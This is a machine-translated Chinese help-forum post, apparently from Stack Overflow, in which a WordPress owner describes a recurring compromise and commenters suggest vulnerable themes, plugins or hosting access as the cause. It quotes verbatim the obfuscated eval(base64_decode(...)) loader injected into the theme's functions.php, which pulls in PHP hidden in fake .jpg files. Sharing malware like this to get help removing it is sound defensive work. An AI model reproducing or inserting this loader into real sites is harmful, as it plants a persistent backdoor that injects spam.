我有一个WordPress网站一直在被黑客入侵。至于我可以跟以下变化正在作出:WordPress的网站一直在被黑客攻击
该文件的顶部有一些额外的PHP代码:
的wp-content /主题/拥抱/ functions.php中
如下:正在创建
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
和4个新的JPG文件:
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
这些都不是真正的jpg文件因为他们没有打开,但用文本编辑器查看它们会显示文本和其他PHP代码。
从看PHP代码,它看起来像试图注入一些垃圾邮件/广告链接到我的WordPress的POSTS。
我一直删除这些文件,我已经安装了一个安全插件,删除了管理员登录名,更改了我所有的密码,但这些文件每隔几天就会不断更新/创建。
我想知道这是如何可能的,我需要做的下一步要阻止这一点。
您是否使用FTP或的cPanel的/ etc访问服务器?这些可能会受到影响。 –
您可能有一个易受攻击的主题或插件。 – SLaks
我敢打赌,你的主题或者一些活跃的插件是脆弱的,我遇到过很多这样的网站,通常使用5年前创建的硬编码主题。 – silver